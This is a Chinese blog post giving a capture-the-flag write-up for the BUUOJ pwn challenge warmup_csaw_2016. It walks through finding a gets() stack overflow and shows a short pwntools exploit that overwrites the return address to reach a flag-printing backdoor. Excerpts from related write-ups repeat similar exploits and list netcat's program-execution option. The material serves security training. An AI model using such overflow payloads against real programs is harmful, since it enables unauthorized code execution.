buuoj warmup_csaw_2016 writeup

最新推荐文章于 2023-08-01 21:54:00 发布
最新推荐文章于 2023-08-01 21:54:00 发布
阅读量158 收藏
点赞数 1
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130917704
版权

题目(三):
【题型】PWN
【题目】warmup_csaw_2016
【来源】(buuoj)https://buuoj.cn/challenges#warmup_csaw_2016
【思路】栈溢出
【具体步骤】
Step1:checksec指令查看,发现是一个没有任何保护的64位的程序。
在这里插入图片描述

Step2:将程序放到IDApro下进行静态分析。
在这里插入图片描述

Step3:查看main函数的伪代码(F5,如果被占用,就用Fn+F5),发现有一个gets函数,猜测是栈溢出,栈的大小是64个字节,但是v5的长度位0x48(0x48+0x08)。
在这里插入图片描述
在这里插入图片描述

Step4:编写exp,得到flag。
源码为:

from pwn import *
p=remote("node4.buuoj.cn",25286)
payload=b'A'*0x48+p64(0x40060D)
p.sendline(payload)
p.interactive()

在这里插入图片描述

22的卡卡
关注
专栏目录
[HCTF 2018]WarmUp WriteUp(超级详细)
lunan的博客
04-22 3641
HCTF 2018:WarmUp 题目来源:BUUCTF 首先打开题目,url查找index.php时发现了一张滑稽的图片,此时查看源码发现source.php文件,直接访问得到界面源码。     显然需要我们进行代码审计,分析源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) //传
BUUOJ [HCTF 2018]WarmUp
qq_43622442的博客
04-11 732
BUUOJ [HCTF 2018]WarmUp 第一次参加ctf,这次头铁的报名了网鼎,hhh,不能给队伍拖后腿了,还是刷刷题。 从buuoj一题一题开始刷,第一题WarmUp。 1.打开网站,发现只有一个滑稽: 2.因为是做的web题,不太可能是隐写,F12看看源码: 3.看到这个source.php没有?访问一下看看: 4.也就是代码审计了,不过这个咋和phpmyadmin的文件包含漏...
buuoj--[HCTF 2018]WarmUp
qq_43619533的博客
12-07 931
buuoj中的第一题:[HCTF 2018]WarmUp 打开题目页面 右键查看源码,发现提示source.php,转到source.php发现源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { ...
buuoj Warmup writeup
m0_73605862的博客
05-08 128
Step4:发现题目说,flag在ffffllllaaaagggg文件。但是发现文件有一个emmm类的checkfile的函数检查。通过检查发现会通过绕过的方式绕过白名单。Step3:查看源码发现此代码存在白名单是source.php和hint.php。所以尝试访问hint.php文件。Step1:打开网页发现除了一张贱嗖嗖的图片啥都么有。Step2:发现有提示我们查看source.php文件。查看source.php文件,得到一些php源码。【来源】(buuoj)https://buuoj.cn/
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1731
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF——Warmup
weixin_44866139的博客
04-30 1415
Warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint....
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
crypto-baby_writeup(buuctf)
耐酸碱高温固化材料近距离传输研究
12-27 397
大概审计了一下enc函数,能看出来是将用户输入字符串每4个字节进行处理,生成3个字节,那么用户输入16个字节最后会加密成12个字节,与data区601100的数据进行比对,比对成功后即输出flag。将原来的比对逻辑改了一下,原来是加密后字节与601100部分比对,比对不成功则退出,改成比对成功则退出,那么现在就可以构造特殊的payload来枚举flag了。elf打补丁教程可以参考。题目提供了一个elf可执行文件,叫做baby_wp。逆向加解密,记录一下。
ADS Writeup_ads_
10-03
"Advanced Data Structure Writeup" 提供了一个深入探讨这一领域的详细分析,涵盖了各种复杂的数据结构及其在实际问题解决中的应用。 **一、数组** 数组是最基础的数据结构,它提供了固定大小且连续的内存空间来...
ADS Writeup_2_ads_
10-02
在“Advanced Data Structure Writeup_2_ads_”这个主题中,我们主要探讨的是高级数据结构的相关概念、应用和实现。数据结构是计算机科学中的一个重要领域,它研究如何组织和存储数据,以便更有效地进行访问和操作。...
warmup_csaw_2016 1
weixin_52034946的博客
01-13 820
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
warmup_csaw_2016
m0_52231248的博客
11-02 139
题目环境是Ubuntu16默认libc2.23 Cheksec程序架构是amd64没有开启任何保护 运行程序程序给我们提示了wow:0x4006d Get函数存在栈溢出,offest=0x40+8个字节 快捷键g跳转程序提示的0x4006d, 发现存在后门函数system(“cat flag.txt”) 于是我们构造exp: from pwn import* r=remote("node4.buuoj.cn",27357) cat...
buuctf pwn [rip] [warmup_csaw_2016 1] [ciscn_2019_n_1 1]
m0_62142241的博客
02-27 474
栈溢出 【以下这几题全是利用栈溢出来进行攻破】 相同步骤: 1.下载文件 2.启动靶机 3.打开Terminal(用nc打开端口,用ls打开目录及文件) 【nc的参数用法 -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连
PWN学习记录(3)BUUCTF-warmup_csaw_2016
最新发布
m0_58824086的博客
08-01 488
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
BUU刷题-Pwn-warmup_csaw_2016
一个啥也不会的小菜鸡!
07-13 101
同时存在危险函数get(),可以实现栈溢出漏洞!发现v5变量距离ebp+8=0x40+8。分析:有后门函数,利用栈溢出。
[BUUCTF]PWN——[V&N2020 公开赛]warmup
mcmuyanga的博客
11-17 452
[V&N2020 公开赛]warmup 步骤: 例行检查,64位程序,除了canary,其他保护都开 本地运行一下,看看大概的情况 64位ida载入,从main函数开始看程序 看到程序将puts函数的地址泄露给了我们 sub_84D()函数里面是prctl函数的沙箱机制 可以利用seccomp-tools工具来查看一下限制了哪些函数 禁止了execve和fork syscall, 关于seccomp-tools工具的安装和使用看这篇文章,关于prctl函数可以看一下这篇文章
BUUCTF [V&N2020 公开赛]warmup
BengDouLove的博客
04-14 846
sub_80A函数进去是初始化设置缓冲区没啥用 sub_84D进去是这样的 进去之后一大堆变量。。。不太想看,,就挑重点的吧 这个prctl 函数简单来说也是设置了沙箱规则 #include <sys/prctl.h> int prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long ar...
buuctf warmup
doudoudedi
01-28 576
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 490
buuctf pwn
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值